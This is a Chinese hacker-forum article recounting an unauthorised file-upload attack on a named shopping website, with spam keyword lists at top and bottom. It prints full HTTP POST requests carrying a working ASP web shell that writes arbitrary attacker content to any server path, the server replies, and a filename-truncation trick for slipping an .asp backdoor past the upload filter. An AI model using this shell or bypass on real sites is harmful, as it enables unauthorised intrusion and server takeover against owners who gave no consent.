国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

一次小小的上傳文件測試
2009-01-03   

下午5:52分,快吃晚飯了,這段時間里我比較喜歡給忙碌了一天的自己放短假,所以按照習慣就跑去幾個常去的黑客站點看看文章,武漢的315安全網我還是比較喜歡的,東西比較多而且更新的也還算及時。
記得看過一次315安全網里的一位兄臺做過一個他們服務器硬盤權限分配的動畫,了解到是一臺虛擬主機,用自己寫的程序跑了跑,看看有沒有什么可以利用的地方,發現了一個動感購物商城的上傳頁面,呵呵……
http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
就抓了個包試試看上傳,包的結果如下:

POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel,   application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3306
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="EditName"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="FormName"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp"
Content-Type: application/octet-stream

<style type="text/css">
<!--
.unnamed1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #000000;
text-decoration: none;
}
.style6 {color: #FF0033}
.style7 {color: #000000; }
.style8 {color: #0000FF}
-->
</style>
<div align="center">
<table width="372" border="1" align="center" class="unnamed1">
<tr>
<td align="center" valign="middle"><div align="center">
<p>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>Save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>絕對路徑(包括文件名:如D:\web\sys.asp):</font>" %>
</p>
<p>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
</p>
<p>             
<% Response.write "本文件<font color=red>絕對路徑:</font>" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</p>
<p>           
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
</p>
<p>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
</p>
<p>
<% Response.write "<input type=submit value=Save>" %>
<% Response.write "</form>" %>
</p>
<p class="style7">Save File Workstation Beautify the version</p>
<p class="style6">  <span class="style8">----Power By Perl</span> </p>
</div></td>
</tr>
</table>
</div>
-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

開始上傳
-----------------------------7d51863950254--

按照正常的手段改數據包先進行測試,提交結果返回為:
HTTP/1.1 500 Internal Server Error
Date: Mon, 18 Apr 2005 10:05:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 493
Content-Type: text/html
Cache-control: private

<!--
┌─ o91.com───────────────┐
│  動感購物商務平臺WWW.SNSN.NET版權所有  │
│  設計:模糊視線13855119911 QQ:9912515 │
└────────────────────┘
-->

<link href="css.css" rel="stylesheet" type="text/css">
<font face="宋體" size=2>
<p>ADODB.Stream</font> <font face="宋體" size=2>錯誤 '800a0bbc'</font>
<p>
<font face="宋體" size=2>寫入文件失敗。</font>
<p>
<font face="宋體" size=2>/upload_wj.inc</font><font face="宋體" size=2>,行 181<
/font>

從返回數據得知根目錄限制了文件寫入,那我們就換一個目錄,將包里的上傳路徑改為bookpic/sys.asp,字節改為3314,提示如下:
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 10:07:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 472
Content-Type: text/html
Cache-control: private

<!--
┌─ o91.com───────────────┐
│  動感購物商務平臺WWW.SNSN.NET版權所有  │
│  設計:模糊視線13855119911 QQ:9912515 │
└────────────────────┘
-->

<link href="css.css" rel="stylesheet" type="text/css">
<script>window.opener.document.myform.bookpic.value='bookpic/sys.asp200541818754
95496.gif'</script>
<script language="javascript">
window.alert("文件上傳成功!請不要修改生成的鏈接地址!");
window.close();
</script>

嘿嘿,文件上傳成功,不過你別急,看清楚包的返回數據為bookpic/sys.asp20054181875495496.gif,打開這個文件來就是我們的后門文件代碼了。都到這個地方了,傳不上去有點不甘心,認真看看文件名bookpic/sys.asp20054181875495496.gif,怎么樣?有點想法沒有?呵呵……
我們的文件后綴.asp它還保留著呢,只不過在后面給我們加上了一段長長的字符串和gif后綴,讓我們的asp文件變成了gif文件。因為我沒有看過這套程序的上傳文件代碼,所以我就靠經驗來改改這個后門的數據包,讓它截斷后面的部分。改動之后的數據包如下:
POST /upfile_flash.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.whdlwj.com/upload_flash.asp?formname=myform&editname=bookpic&uppath=bookpic&filelx=jpg
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d51863950254
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.whdlwj.com
Content-Length: 3316
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCARBBDSS=NDPLMAIBCAFLEEMECJONPJJJ

-----------------------------7d51863950254
Content-Disposition: form-data; name="filepath"

bookpic/wolf.asp
-----------------------------7d51863950254
Content-Disposition: form-data; name="filelx"

jpg
-----------------------------7d51863950254
Content-Disposition: form-data; name="EditName"

bookpic
-----------------------------7d51863950254
Content-Disposition: form-data; name="FormName"

myform
-----------------------------7d51863950254
Content-Disposition: form-data; name="act"

uploadfile
-----------------------------7d51863950254
Content-Disposition: form-data; name="file1"; filename="G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp.gif"
Content-Type: application/octet-stream

<style type="text/css">
<!--
.unnamed1 {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #000000;
text-decoration: none;
}
.style6 {color: #FF0033}
.style7 {color: #000000; }
.style8 {color: #0000FF}
-->
</style>
<div align="center">
<table width="372" border="1" align="center" class="unnamed1">
<tr>
<td align="center" valign="middle"><div align="center">
<p>
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
<% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>
<% if Trim(request("syfdpath"))"" then %>
<% fdata = request("cyfddata") %>
<% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>
<% objCountFile.Write fdata %>
<% if err =0 then %>
<% response.write "<font color=red>Save Success!</font>" %>
<% else %>
<% response.write "<font color=red>Save UnSuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objCountFile.Close %>
<% Set objCountFile=Nothing %>
<% Set objFSO = Nothing %>
<% Response.write "<form action='' method=post>" %>
<% Response.write "保存文件的<font color=red>絕對路徑(包括文件名:如D:\web\sys.asp):</font>" %>
</p>
<p>
<% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>
<% Response.Write "<br>" %>
</p>
<p>             
<% Response.write "本文件<font color=red>絕對路徑:</font>" %>
<% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>
</p>
<p>           
<% Response.write "<br>" %>
<% Response.write "輸入馬的內容:" %>
</p>
<p>
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
</p>
<p>
<% Response.write "<input type=submit value=Save>" %>
<% Response.write "</form>" %>
</p>
<p class="style7">Save File Workstation Beautify the version</p>
<p class="style6">  <span class="style8">----Power By Perl</span> </p>
</div></td>
</tr>
</table>
</div>
-----------------------------7d51863950254
Content-Disposition: form-data; name="Submit"

開始上傳
-----------------------------7d51863950254--

整個包的大體并沒變化,只需要將第一次修改的數據包里的G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.gif改為G:\backdoor\網頁木馬\海陽ASP木馬\2005\改好的\save.asp.gif,其余不變,再傳一次。上傳的窗口一閃就關閉了(因為我是用了個BAT來執行提交的),嘿嘿……雖然看不到返回結果,不過我知道這個時候數據已經被我截斷了,文件也正常的變成了asp。再進后門看看,瀏覽器顯示:

該頁無法顯示
您試圖從目錄中執行 CGI、ISAPI 或其他可執行程序,但該目錄不允許執行程序。
--------------------------------------------------------------------------------

請嘗試以下操作:

如果您認為該目錄應該允許執行訪問權限,請與網站管理員聯系。
HTTP 錯誤 403.1 - 禁止訪問:執行訪問被拒絕。
Internet 信息服務 (IIS)

嘿嘿……有這個顯示就說明OK了,可以上傳ASP文件了,之后又換了換目錄試試,都不允許寫入文件^_^!。這個圖片目錄也不允許執行我們的后門。
畢竟是安全站點的主機,在目錄限制和權限設置這方面做的還可以,要不一會就被人黑了可就羞大了^_^。到這里,我做的整個測試就結束了,不知道看完了大家有什么感想,雖然并沒有拿到SHELL,其實我想突出講的一點是文章中的思路,以及平時需要的是多積累經驗,在應用的再多留心一點,那發現一點點小東西并不是特別的困難^_^。(文章看的不爽的別拿雞蛋丟,我吃的怕了,拿錢咂我好了,我窮啊~~~)。


熱詞搜索:

上一篇:提權,以MySQL之名
下一篇:trim()的漏洞破解與防護+文章始末

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲精品久久久蜜桃| 久久精品国产久精国产爱| 久久九九国产精品怡红院| 国产在线精品一区二区夜色| 国产一区二区三区直播精品电影| 91久久综合| 中国日韩欧美久久久久久久久| 欧美午夜不卡视频| 欧美精品日韩综合在线| 99热免费精品| 亚洲欧美日韩国产中文在线| 亚洲精品一区二区三| 久久夜色精品国产欧美乱极品| 在线视频亚洲欧美| 亚洲欧美中文在线视频| 一区二区三区精品国产| 99国产精品久久久久久久成人热| 亚洲欧洲日本国产| 亚洲国产欧美一区二区三区丁香婷| 国语自产在线不卡| 韩国一区二区三区美女美女秀| 国产区精品在线观看| 国产午夜精品麻豆| 黄色一区二区在线| 在线日韩欧美视频| 亚洲人成人99网站| 中文亚洲字幕| 一区二区欧美日韩| 亚洲欧美久久| 久久久精品动漫| 欧美成人视屏| 欧美午夜电影网| 国产酒店精品激情| 激情五月综合色婷婷一区二区| 亚洲福利在线视频| 中文在线资源观看网站视频免费不卡| 一区二区三区.www| 久久国产精彩视频| 欧美激情精品久久久六区热门 | 亚洲午夜激情| 午夜精品久久久久久久男人的天堂| 一区二区三区鲁丝不卡| 美女主播一区| 欧美高清视频一区二区三区在线观看| 亚洲午夜久久久| 国产亚洲精品久久飘花| 精品88久久久久88久久久| 亚洲国内精品| 亚洲婷婷在线| 久久久精品欧美丰满| 欧美国产精品中文字幕| 国产精品久久久久久福利一牛影视| 国产亚洲精品久久飘花| 亚洲美女毛片| 久久精品亚洲一区| 欧美日韩网址| 黄色一区二区在线| 一区二区三区欧美亚洲| 久久久久久国产精品一区| 欧美日韩无遮挡| 在线观看91精品国产入口| 亚洲一区二区三区乱码aⅴ| 久久综合九色综合网站 | 美女被久久久| 国产精品捆绑调教| 亚洲黄色天堂| 性亚洲最疯狂xxxx高清| 欧美精品一区二区三| 国产欧美一区二区三区久久| 亚洲精品视频在线看| 久久久.com| 国产精品久久久久久久久免费| 亚洲欧洲日韩综合二区| 欧美一区二区在线播放| 欧美午夜影院| 9i看片成人免费高清| 欧美va亚洲va国产综合| 国内精品嫩模av私拍在线观看| 亚洲视频狠狠| 欧美精品尤物在线| 亚洲国产精品一区二区www在线| 欧美在线一二三四区| 国产精品久久久久天堂| 夜夜嗨av色综合久久久综合网| 欧美高清视频| 最近看过的日韩成人| 免费观看国产成人| 禁久久精品乱码| 老司机精品视频网站| 亚洲精品乱码久久久久久| 新狼窝色av性久久久久久| 亚洲激情婷婷| 欧美三级特黄| 欧美在线看片a免费观看| 欧美视频一区二区三区| 国产视频欧美| 99精品欧美| 美女主播精品视频一二三四| 国产一区在线看| 欧美在线资源| 怡红院av一区二区三区| 欧美色大人视频| 国产一区在线看| 亚洲欧美一区二区激情| 欧美激情小视频| 在线观看不卡| 国产一二精品视频| 亚洲国产精品一区| 久久深夜福利免费观看| 欧美精品成人一区二区在线观看| 新67194成人永久网站| 欧美一级在线播放| 欧美精品日韩三级| 伊人春色精品| 国产精品国色综合久久| 欧美日韩日日夜夜| 亚洲免费播放| 欧美大片一区二区| 国产一区清纯| 久久男人资源视频| 一区二区三区视频观看| 欧美日韩你懂的| 国产精品久99| 国产精品毛片a∨一区二区三区| 国产精品视频一二| 欧美刺激性大交免费视频 | 国产精品日韩在线播放| 午夜电影亚洲| 国产精品美女久久久久久久| 久久久久久成人| 亚洲国产精品久久久| 欧美好骚综合网| 欧美一区二区三区四区在线| 国产一区二区三区的电影| 欧美高清不卡| 亚洲欧美日韩综合国产aⅴ| 国产精品久久久久久久久久尿| 亚洲欧美日韩国产精品| 樱桃成人精品视频在线播放| 欧美精品系列| 这里是久久伊人| 国产免费一区二区三区香蕉精| 国产精品尤物福利片在线观看| 最新日韩精品| 欧美激情综合在线| 午夜精品一区二区三区在线| 欧美色123| 亚洲免费视频在线观看| 欧美图区在线视频| 午夜精品久久久久久久男人的天堂 | 一区二区三区日韩欧美精品| 久久精品色图| 一区二区免费在线观看| 欧美激情第一页xxx| 亚洲视屏一区| 欧美激情一区二区三区在线视频观看| 久久精彩免费视频| 久久综合五月天婷婷伊人| 国产亚洲成精品久久| 欧美精品一级| 国内精品模特av私拍在线观看| 欧美性大战久久久久| 免费在线日韩av| 久久午夜电影| 亚洲天堂偷拍| 在线欧美影院| 激情五月***国产精品| 国产乱理伦片在线观看夜一区| 欧美久久久久免费| 狼狼综合久久久久综合网 | 国产色产综合产在线视频| 亚洲女同性videos| 在线观看日韩精品| 国产精品私人影院| 欧美在线一二三区| 伊人天天综合| 国产一区日韩一区| 欧美日韩国产一级| 免费中文字幕日韩欧美| 欧美尤物巨大精品爽| 免费成人高清视频| 亚洲影视在线播放| 在线亚洲电影| 欧美激情精品| 欧美mv日韩mv国产网站app| 欧美一级欧美一级在线播放| 亚洲综合清纯丝袜自拍| 午夜欧美精品久久久久久久| 午夜精品久久久久久久久久久久| 亚洲综合导航| 亚洲欧美福利一区二区| 亚洲欧美激情诱惑| 欧美在线视频a| 久久久国产精彩视频美女艺术照福利| 久久av二区| 久久精品国产欧美亚洲人人爽| 欧美在线观看你懂的| 久久成人综合视频| 久热re这里精品视频在线6| 免费成人高清视频|